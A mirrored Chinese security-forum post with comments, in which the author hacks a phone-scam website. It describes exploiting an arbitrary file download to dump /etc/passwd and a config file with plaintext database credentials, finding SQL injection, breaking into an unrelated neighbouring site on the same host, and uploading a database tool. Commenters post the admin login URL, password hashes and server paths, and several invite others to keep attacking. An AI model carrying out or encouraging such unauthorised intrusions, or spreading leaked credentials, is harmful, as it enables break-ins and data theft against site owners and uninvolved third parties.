WooYun Zone镜像——入侵电话诈骗的骗子网站

admin 8月前 155

【同事亲历的一次电话诈骗】,挺有意思,没看过的同学可以看看涨姿势。

链接:同事亲历的一次电话诈骗

里面附带了骗子的网址:http://sppcn010952110.com

那就来日日看吧。

一看界面,煞有解释,应该是直接把官方的抓取过来了,但是左右两个链接异常可疑


左边的东西下载下来是一个Teamviewer。。。擦,远控啊= =,连图标也不改

仔细瞅瞅这链接:http://sppcn010952110.com/downloadfile.php?file=check.exe

果断任意文件下载:

得到一些儿信息

nobody❌99:99:Nobody:/:/sbin/nologin

root❌0:0:root:/root:/bin/bash

mail❌8:12:mail:/var/spool/mail:/sbin/nologin

postfix❌89:89::/var/spool/postfix:/sbin/nologin

mailnull❌47:47:Exim:/var/spool/mqueue:/bin/false

mailman❌32006:32006::/usr/local/cpanel/3rdparty/mailman/mailman:/usr/local/cpanel/bin/noshell

cpaneleximfilter❌32009:32010::/var/cpanel/userhomes/cpaneleximfilter:/usr/local/cpanel/bin/noshell

bin❌1:1:bin:/bin:/sbin/nologin

daemon❌2:2:daemon:/sbin:/sbin/nologin

adm❌3:4:adm:/var/adm:/sbin/nologin

lp❌4:7:lp:/var/spool/lpd:/sbin/nologin

sync❌5:0:sync:/sbin:/bin/sync

shutdown❌6:0:shutdown:/sbin:/sbin/shutdown

halt❌7:0:halt:/sbin:/sbin/halt

uucp❌10:14:uucp:/var/spool/uucp:/sbin/nologin

operator❌11:0:operator:/root:/sbin/nologin

games❌12????games:/usr/games:/sbin/nologin

gopher❌13:30:gopher:/var/gopher:/sbin/nologin

ftp❌14:50:FTP User:/var/ftp:/sbin/nologin

dbus❌81:81:System message bus:/:/sbin/nologin

vcsa❌69:69:virtual console memory owner:/dev:/sbin/nologin

rpc❌32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin

rpcuser❌29:29:RPC Service User:/var/lib/nfs:/sbin/nologin

haldaemon❌68:68:HAL daemon:/:/sbin/nologin

sshd❌74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin

named❌25:25:Named:/var/named:/sbin/nologin

mysql❌498:498:MySQL server:/var/lib/mysql:/bin/bash

sppcncom❌837:838::/home/sppcncom:/usr/local/cpanel/bin/noshell

<?

$web_url = $_SERVER['PHP_SELF'];

$web_url = strrchr($web_url,"/");

$web_url = str_replace("/","",$web_url);

$web_domain = $_SERVER["HTTP_HOST"];

$host_url = "http://" . $web_domain;

//sppcntwd

$mysql_host_port = 'localhost:3306';

$mysql_user = 'sppcncom_a1';

$db_name = 'sppcncom_1';

$mysql_password = '2aqlpswko';

$connection = mysql_connect($mysql_host_port,$mysql_user,$mysql_password) or die("Could not connect");

$link = mysql_connect($mysql_host_port,$mysql_user,$mysql_password) or die("Could not connect");

$serverset = "character_set_connection='utf8', character_set_results='utf8', character_set_client='binary'";

mysql_query("SET $serverset");

mysql_select_db("$db_name") or die("Could not select database");

mysql_set_charset('utf8', $connection);

?>

再看看右边的,应该是查通缉令那个系统了:


随便输入个引号:

恩。。注入

然后。。然后按照常理来说是扫扫后台吧。。。

恩。。扫不到。。= =

然后就旁注吧

台湾友人的站,罪过罪过。。。

随便日了一个站,看到是蛋疼的linux

Linux sp18.g-dns.com 2.6.32-458.23.2.lve1.2.52.el6.x86_64 #1 SMP Mon Feb 3 06:07:54 EST 2014 x86_64(besttaiw)

结果找不到网站目录啊。。。估计是虚拟主机,我也懒得提权了。

最后丢了一个脚本上去看看数据库里都有啥


这目测是钓鱼钓到的?看来已经有前辈日过了吧。。


这是后台的用户密码,扫到地址的同学可以登录上去玩玩~


我就日到这儿了,大家继续日吧。。。


1#

博丽灵梦 (啊 我中枪了) | 2014-07-08 00:56

删掉所有信息 为民除害吧

2#

骚动侠 (专业灌水五十年) | 2014-07-08 00:56

http://sppcn010952110.com/manage/login.php

3#

骚动侠 (专业灌水五十年) | 2014-07-08 01:10

+----------------------------------+-----------+

| password | user_name |

+----------------------------------+-----------+

| b5d751ef310e921f696bd4033c4a18ed | 管理者 |

| 5416d7cd6ef195a0f7622a9c56b55e84 | system |

+----------------------------------+-----------+

4#

随随意意 (fuck:9999) | 2014-07-08 01:18

从来不相信这些的,有些电话诈骗挺真,这个确实。。。太奇葩了!

5#

Ricter (j0j0) | 2014-07-08 07:36

/home/sppcncom/public_html/

6#

国士无双 (我来找快乐。) | 2014-07-08 09:19

7. 如果你碰到一个十分高效的ZF机关,多半是骗子

7#

Croxy | 2014-07-08 09:20

7. 如果你碰到一个十分高效的ZF机关,多半是骗子

8#

Jumbo | 2014-07-08 09:23

"最后丢了一个脚本上去看看数据库里都有啥 "啥子脚本

9#

Ki11 (下载我的头像改后缀为rar有惊喜哦) | 2014-07-08 09:23

已经被删了...

10#

小胖子 (全世界背叛我又怎样,有z7y就足够了。) | 2014-07-08 09:35

7. 如果你碰到一个十分高效的ZF机关,多半是骗子

11#

El4pse | 2014-07-08 09:53

@Jumbo adminer

12#

Comer | 2014-07-08 11:14

嗯,昨晚上去看了眼~~今天早上也接到冒充招商的电话了...

13#

Cyrils (╭(′▽`)╯) | 2014-07-08 11:33

7. 如果你碰到一个十分高效的ZF机关,多半是骗子

14#

Ricter (j0j0) | 2014-07-08 11:58

@Ki11 我滲透完給刪了..

15#

Mujj (Krypt VPS特价www.80host.com) | 2014-07-08 12:02

干的好,已打赏1WB。

16#

Mujj (Krypt VPS特价www.80host.com) | 2014-07-08 12:07

http://sppgov.net/

http://142.4.54.215/

17#

xsser (十根阳具有长短!!) | 2014-07-08 12:17

打赏

18#

Finger (Save water. Shower with your girlfriend.) | 2014-07-08 13:12

其中的电话号码伪造是很容易的,手机app+有网络即可,我通常是用18188889999给别人打电话的

19#

傻逼 (我是傻逼) | 2014-07-08 14:27

7. 如果你碰到一个十分高效的ZF机关,多半是骗子


最新回复 (0)
返回
发新帖